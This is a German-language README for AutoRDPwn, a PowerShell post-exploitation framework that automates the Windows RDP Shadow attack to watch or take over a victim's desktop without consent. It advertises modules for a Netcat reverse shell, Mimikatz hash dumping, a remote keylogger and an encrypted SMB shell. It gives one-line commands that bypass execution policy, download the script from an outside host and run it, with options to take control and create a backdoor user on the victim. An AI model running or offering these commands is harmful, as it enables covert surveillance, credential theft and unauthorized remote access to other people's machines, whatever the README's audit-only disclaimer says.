
Das Shadow Attack Framework

AutoRDPwn ist ein Post-Exploitation-Framework, das in Powershell erstellt wurde und hauptsächlich dazu dient, den Shadow-Angriff auf Microsoft Windows-Computer zu automatisieren. Diese Sicherheitslücke (von Microsoft als Feature gelistet) erlaubt es einem entfernten Angreifer, den Desktop seines Opfers ohne dessen Zustimmung einzusehen und bei Bedarf sogar zu steuern – unter Verwendung von Tools, die im Betriebssystem selbst enthalten sind.
Dank der zusätzlichen Module ist es möglich, eine entfernte Shell über Netcat zu erhalten, System-Hashes mit Mimikatz auszulesen, einen entfernten Keylogger zu laden und vieles mehr. All dies über ein vollständig intuitives Menü in sieben verschiedenen Sprachen.
Darüber hinaus kann es in einer Reverse-Shell über eine Reihe von Parametern verwendet werden, die im Abschnitt zur Verwendung beschrieben sind.
Powershell 4.0 oder höher
• Viele Fehler behoben
• Ästhetische Verbesserungen und verbesserte Wartezeiten
• Proxy-fähige Verbindung über Systemeinstellungen
• Es ist jetzt möglich, das Offline-Tool durch Herunterladen der .zip-Datei zu verwenden
• Spracherkennung durch Drücken der Eingabetaste
• Invoke-DCOM wurde durch SharpRDP ersetzt
• PowerUp wurde durch Invoke-PrivescCheck ersetzt
• Erstellung der automatischen Bereinigungsroutine auf dem Opfer
• Neues Modul verfügbar: SMB Shell verschlüsselt mit AES
• Neues Modul verfügbar: Benutzerwechsel mit RunAs
*Die restlichen Änderungen können in der CHANGELOG-Datei eingesehen werden
Diese Anwendung kann lokal, remote oder zum Pivotieren zwischen Rechnern verwendet werden.
Bei Fernverwendung in einer Reverse-Shell müssen die folgenden Parameter verwendet werden:
Lokale Ausführung in einer Zeile:
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"
Beispiel für eine entfernte Ausführung in einer Zeile:
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser"
https://darkbyte.net/autordpwn-la-guia-definitiva

Dieses Projekt ist unter der GNU 3.0-Lizenz lizenziert – siehe die LICENSE-Datei für weitere Details.
Dieses Framework wurde von Grund auf von Joel Gámez Molina // @JoelGMSec erstellt und entwickelt.
Einige Module verwenden Code, Skripte und Tools von Drittanbietern, insbesondere:
• Chachi-Enumerator von Luis Vacas --> https://github.com/Hackplayers/PsCabesha-tools
• Invoke-Phant0m von Halil Dalabasmaz --> https://github.com/hlldz/Invoke-Phant0m
• Invoke-PowerShellTcp von Nikhil "SamratAshok" Mittal --> https://github.com/samratashok/nishang
• Invoke-TheHash von Kevin Robertson --> https://github.com/Kevin-Robertson/Invoke-TheHash
• Mimikatz von Benjamin Delpy --> https://github.com/gentilkiwi/mimikatz
• PsExec von Mark Russinovich --> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
• RDP Wrapper von Stas'M Corp. --> https://github.com/stascorp/rdpwrap
• SharpRDP von Steven F --> https://github.com/0xthirteen/SharpRDP
Und viele weitere, die hier nicht aufgeführt werden können.. Vielen Dank an alle und ihre hervorragende Arbeit.
Diese Software bietet keinerlei Garantie. Ihre Verwendung ist ausschließlich für Bildungsumgebungen und/oder Sicherheitsaudits mit entsprechender Zustimmung des Kunden bestimmt. Ich übernehme keine Verantwortung für Missbrauch oder mögliche daraus entstehende Schäden.
Weitere Informationen finden Sie auf Twitter unter @JoelGMSec und auf meinem Blog darkbyte.net.
Sie können meine Arbeit unterstützen, indem Sie mir einen Kaffee kaufen:
| Parameter | Beschreibung |
|---|
| -admin / -noadmin | Abhängig von den Berechtigungen, die wir haben, verwenden wir den einen oder anderen |
| -nogui | Dadurch wird das Laden des Menüs und einige Farben vermieden, die Funktionalität bleibt gewährleistet |
| -lang | Wir wählen unsere Sprache (Englisch, Spanisch, Französisch, Deutsch, Italienisch, Russisch oder Portugiesisch) |
| -option | Wie im Menü können wir wählen, wie der Angriff gestartet werden soll |
| -shadow | Wir entscheiden, ob wir das entfernte Gerät sehen oder steuern möchten |
| -createuser | Dieser Parameter ist optional, der Benutzer AutoRDPwn:AutoRDPwn wird auf dem Opfer-Rechner erstellt |
| -noclean | Deaktiviert den Prozess des Rückgängigmachens aller Änderungen auf dem Opfer-Rechner |